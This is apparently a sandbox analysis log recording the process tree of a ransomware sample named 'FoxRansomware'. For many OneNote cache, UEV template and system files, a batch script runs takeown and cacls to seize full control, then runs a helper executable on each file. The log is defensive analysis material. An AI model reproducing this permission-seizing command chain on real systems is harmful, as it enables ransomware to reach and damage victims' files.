-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner4⤵PID:6004
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml""2⤵PID:2744
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml" /E /G Admin:F /C3⤵PID:3316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml"3⤵
- Modifies file permissions
PID:5948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner3⤵PID:1400
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner4⤵PID:1696
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml""2⤵PID:5276
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml" /E /G Admin:F /C3⤵PID:6620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml"3⤵PID:4324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner3⤵PID:5396
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner4⤵PID:884
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4672
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""2⤵PID:5440
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C3⤵PID:6928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"3⤵
- Modifies file permissions
PID:7812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner3⤵PID:6348
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner4⤵PID:5132
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.a5aee501-45ef-4436-bd89-eeca014254ea.1.etl""2⤵PID:6272
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.a5aee501-45ef-4436-bd89-eeca014254ea.1.etl" /E /G Admin:F /C3⤵PID:3664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.a5aee501-45ef-4436-bd89-eeca014254ea.1.etl"3⤵PID:1928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MoUsoCoreWorker.a5aee501-45ef-4436-bd89-eeca014254ea.1.etl" -nobanner3⤵PID:8024
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MoUsoCoreWorker.a5aee501-45ef-4436-bd89-eeca014254ea.1.etl" -nobanner4⤵PID:2968
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""2⤵PID:4476
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C3⤵PID:5432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"3⤵
- Modifies file permissions
PID:8116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "KnownGameList.bin" -nobanner3⤵PID:3204
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "KnownGameList.bin" -nobanner4⤵PID:3156
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1584
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin""2⤵PID:7424
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin" /E /G Admin:F /C3⤵PID:7248
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin"3⤵PID:6148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000D.bin" -nobanner3⤵PID:6252
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000000D.bin" -nobanner4⤵PID:2888
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin""2⤵PID:7664
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin" /E /G Admin:F /C3⤵PID:7484
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000P.bin"3⤵
- Modifies file permissions
PID:7344
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000P.bin" -nobanner3⤵PID:7552
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000000P.bin" -nobanner4⤵PID:6280
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7524
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin""2⤵PID:7684
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin" /E /G Admin:F /C3⤵PID:272
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000013.bin"3⤵PID:7964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000013.bin" -nobanner3⤵PID:7864
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000013.bin" -nobanner4⤵PID:7632
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:8044
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:7432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:1680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat"3⤵
- Modifies file permissions
PID:7908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "settings.dat" -nobanner3⤵PID:7324
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "settings.dat" -nobanner4⤵PID:7148
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5852
-
-
-
Level 2  C:\Windows\SysWOW64\cmd.exe  PID 7496
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
Level 3  C:\Windows\SysWOW64\cacls.exe  PID 7640
  Command line: cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
Level 3  C:\Windows\SysWOW64\takeown.exe  PID 7948
  Command line: takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
Level 3  C:\Windows\SysWOW64\cmd.exe  PID 3456
  Command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "superbar.png" -nobanner
Level 4  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 5480
  Command line: yMelI2Cu.exe -accepteula "superbar.png" -nobanner
Level 3  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 6292
  Command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
Level 2  C:\Windows\SysWOW64\cmd.exe  PID 6708
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
Level 3  C:\Windows\SysWOW64\cacls.exe  PID 7352
  Command line: cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
Level 3  C:\Windows\SysWOW64\takeown.exe  PID 6960
  Command line: takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
Level 3  C:\Windows\SysWOW64\cmd.exe  PID 7896
  Command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner
Level 4  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 4828
  Command line: yMelI2Cu.exe -accepteula "resource.xml" -nobanner
Level 3  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 6952
  Command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
Level 2  C:\Windows\SysWOW64\cmd.exe  PID 784
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml""
Level 3  C:\Windows\SysWOW64\cacls.exe  PID 6352
  Command line: cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" /E /G Admin:F /C
Level 3  C:\Windows\SysWOW64\takeown.exe  PID 6640
  Command line: takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml"
Level 3  C:\Windows\SysWOW64\cmd.exe  PID 1700
  Command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner
Level 4  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 6824
  Command line: yMelI2Cu.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner
Level 3  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 6980
  Command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
Level 2  C:\Windows\SysWOW64\cmd.exe  PID 6664
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml""
Level 3  C:\Windows\SysWOW64\cacls.exe  PID 7040
  Command line: cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml" /E /G Admin:F /C
Level 3  C:\Windows\SysWOW64\takeown.exe  PID 8156
  Command line: takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml"
Level 3  C:\Windows\SysWOW64\cmd.exe  PID 452
  Command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner
Level 4  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 7612
  Command line: yMelI2Cu.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner
Level 3  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 6804
  Command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
Level 2  C:\Windows\SysWOW64\cmd.exe  PID 5896
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml""
Level 3  C:\Windows\SysWOW64\cacls.exe  PID 7008
  Command line: cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml" /E /G Admin:F /C
Level 3  C:\Windows\SysWOW64\takeown.exe  PID 6112
  Command line: takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml"
Level 3  C:\Windows\SysWOW64\cmd.exe  PID 6772
  Command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner
Level 4  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 7056
  Command line: yMelI2Cu.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner
Level 3  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 6624
  Command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
Level 2  C:\Windows\SysWOW64\cmd.exe  PID 6616
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
Level 3  C:\Windows\SysWOW64\cacls.exe  PID 6812
  Command line: cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C
Level 3  C:\Windows\SysWOW64\takeown.exe  PID 6636
  Command line: takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
Level 3  C:\Windows\SysWOW64\cmd.exe  PID 4568
  Command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
Level 4  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 4952
  Command line: yMelI2Cu.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
Level 3  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 5548
  Command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
Level 2  C:\Windows\SysWOW64\cmd.exe  PID 6884
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl""
Level 3  C:\Windows\SysWOW64\cacls.exe  PID 7464
  Command line: cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl" /E /G Admin:F /C
Level 3  C:\Windows\SysWOW64\takeown.exe  PID 6696
  Command line: takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl"
Level 3  C:\Windows\SysWOW64\cmd.exe  PID 6340
  Command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl" -nobanner
Level 4  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 6160
  Command line: yMelI2Cu.exe -accepteula "MoUsoCoreWorker.c75f762d-8ffb-435e-b312-fc4c7cea23ff.1.etl" -nobanner
Level 3  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 5368
  Command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
Level 2  C:\Windows\SysWOW64\cmd.exe  PID 5032
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin""
Level 3  C:\Windows\SysWOW64\cacls.exe  PID 5516
  Command line: cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin" /E /G Admin:F /C
Level 3  C:\Windows\SysWOW64\takeown.exe  PID 5376
  Command line: takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin"
Level 3  C:\Windows\SysWOW64\cmd.exe  PID 7128
  Command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000008.bin" -nobanner
Level 4  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 1128
  Command line: yMelI2Cu.exe -accepteula "00000008.bin" -nobanner
Level 3  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 5156
  Command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
Level 2  C:\Windows\SysWOW64\cmd.exe  PID 5872
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin""
Level 3  C:\Windows\SysWOW64\cacls.exe  PID 5080
  Command line: cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin" /E /G Admin:F /C
Level 3  C:\Windows\SysWOW64\takeown.exe  PID 5228
  Command line: takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin"
Level 3  C:\Windows\SysWOW64\cmd.exe  PID 5496
  Command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000M.bin" -nobanner
Level 4  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 4532
  Command line: yMelI2Cu.exe -accepteula "0000000M.bin" -nobanner
Level 3  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 316
  Command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
Level 2  C:\Windows\SysWOW64\cmd.exe  PID 1372
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin""
Level 3  C:\Windows\SysWOW64\cacls.exe  PID 3524
  Command line: cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin" /E /G Admin:F /C
Level 3  C:\Windows\SysWOW64\takeown.exe  PID 5168
  Command line: takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000010.bin"
Level 3  C:\Windows\SysWOW64\cmd.exe  PID 940
  Command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000010.bin" -nobanner
Level 4  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 5244
  Command line: yMelI2Cu.exe -accepteula "00000010.bin" -nobanner
Level 3  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 4540
  Command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
Level 2  C:\Windows\SysWOW64\cmd.exe  PID 7412
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin""
Level 3  C:\Windows\SysWOW64\cacls.exe  PID 3596
  Command line: cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin" /E /G Admin:F /C
Level 3  C:\Windows\SysWOW64\takeown.exe  PID 5528
  Command line: takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000054.bin"
Level 3  C:\Windows\SysWOW64\cmd.exe  PID 4240
  Command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000054.bin" -nobanner
Level 4  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 6304
  Command line: yMelI2Cu.exe -accepteula "00000054.bin" -nobanner
Level 3  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 5668
  Command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
Level 2  C:\Windows\SysWOW64\cmd.exe  PID 3640
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin""
Level 3  C:\Windows\SysWOW64\cacls.exe  PID 4500
  Command line: cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin" /E /G Admin:F /C
Level 3  C:\Windows\SysWOW64\takeown.exe  PID 4032
  Command line: takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin"
Level 3  C:\Windows\SysWOW64\cmd.exe  PID 7220
  Command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000070.bin" -nobanner
Level 4  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 2432
  Command line: yMelI2Cu.exe -accepteula "00000070.bin" -nobanner
Level 3  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 5796
  Command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
Level 2  C:\Windows\SysWOW64\cmd.exe  PID 5772
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin""
Level 3  C:\Windows\SysWOW64\cacls.exe  PID 5696
  Command line: cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin" /E /G Admin:F /C
Level 3  C:\Windows\SysWOW64\takeown.exe  PID 6592
  Command line: takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007A.bin"
Level 3  C:\Windows\SysWOW64\cmd.exe  PID 5272
  Command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000007A.bin" -nobanner
Level 4  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 4576
  Command line: yMelI2Cu.exe -accepteula "0000007A.bin" -nobanner
Level 3  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 7588
  Command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
Level 2  C:\Windows\SysWOW64\cmd.exe  PID 1124
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin""
Level 3  C:\Windows\SysWOW64\cacls.exe  PID 4948
  Command line: cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin" /E /G Admin:F /C
Level 3  C:\Windows\SysWOW64\takeown.exe  PID 5844
  Command line: takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007K.bin"
  Signatures: Modifies file permissions
Level 3  C:\Windows\SysWOW64\cmd.exe  PID 7004
  Command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000007K.bin" -nobanner
Level 4  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 5932
  Command line: yMelI2Cu.exe -accepteula "0000007K.bin" -nobanner
Level 3  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 5428
  Command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
Level 2  C:\Windows\SysWOW64\cmd.exe  PID 5100
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin""
Level 3  C:\Windows\SysWOW64\cacls.exe  PID 3192
  Command line: cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin" /E /G Admin:F /C
Level 3  C:\Windows\SysWOW64\takeown.exe  PID 6900
  Command line: takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008J.bin"
  Signatures: Modifies file permissions
Level 3  C:\Windows\SysWOW64\cmd.exe  PID 1528
  Command line: C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000008J.bin" -nobanner
Level 4  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 6976
  Command line: yMelI2Cu.exe -accepteula "0000008J.bin" -nobanner
Level 3  C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe  PID 5996
  Command line: yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner
Level 2  C:\Windows\SysWOW64\cmd.exe  PID 5832
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008V.bin""
Level 3  C:\Windows\SysWOW64\cacls.exe  PID 3908
